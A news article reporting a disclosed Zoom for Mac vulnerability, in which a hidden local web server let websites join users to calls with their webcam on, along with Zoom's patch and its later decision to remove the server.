Vulnerability in Zoom for Mac calling app could let others watch webcams
A leak in the Mac version of the popular video conferencing app Zoom makes it possible to watch with other webcams. Zoom itself calls that a “work-around” for limitations in macOS.
The vulnerability was discovered in May by a security researcher who reported it to Zoom. The company has since released a patch. Researcher Jonathan Leitschuh is now publishing details, but also says that some of the repairs Zoom has made are just plasters on the wounds. Zoom says it is starting a bug bounty program in response to the vulnerability.
Zoom is a video conferencing app used by more than four million users on the Mac. The app mainly allows business users to set up calls by adding participants to a call. However, the authentication for this appears to leave a lot to be desired.
When a user installs Zoom on a Mac, a local server is activated. Via that server it is then possible to add new Zoom users to a conversation. An API is used for this, so that other apps or websites can also communicate with the Zoom app. According to Leitschuh, this indicates that the app has many more options than are necessary. “The fact that you are installing an app that puts a web server on my local machine and whose api is not documented is very dubious to me,” he writes. “And if every website I visit can respond with this website running on my machine, I see that as a big threat.” Leitschuh managed to manipulate the API so that with a simple HTTP GET request, he could access any Zoom meeting for which he knew the conference number.
Leitschuh found that Zoom does not use standard AJAX requests, but that the server uses images and resizes to show certain status messages. For example, if the ratio is 1 by 1, there is nothing wrong, but a 2 by 3 ratio means there is an error downloading an update. According to the researcher, Zoom uses that rather unique approach to bypass Safari 12’s Cross-Origin Resource Sharing, or CORS. For example, he discovered that the app had much more access to the system than he initially thought. The fact that Zoom runs as such a local server also means that a possible future vulnerability could do a lot of damage to a victim’s machine, according to the researcher. He refers, for example, to a vulnerability that was patched six months ago in Zoom, which allowed code to be executed on a machine from a distance.
Zoom has now implemented a patch that fixes part of the vulnerability. For example, a signature is now added to a request by default, but according to Leitschuh there are still possibilities to exploit the leak. Hosts can also prevent new users from accessing the video directly in a call. Leitschuh says the vulnerability could be exploited with a drive-by download, such as if a user visits an infected website via phishing.
Update July 10: Zoom is going to stop using a local server after all. There will be a software update that will immediately remove the servers, the company writes in a blog post. Zoom says that it initially saw no problem in using a local server, but that after the great commotion among users, it is opting for a different solution.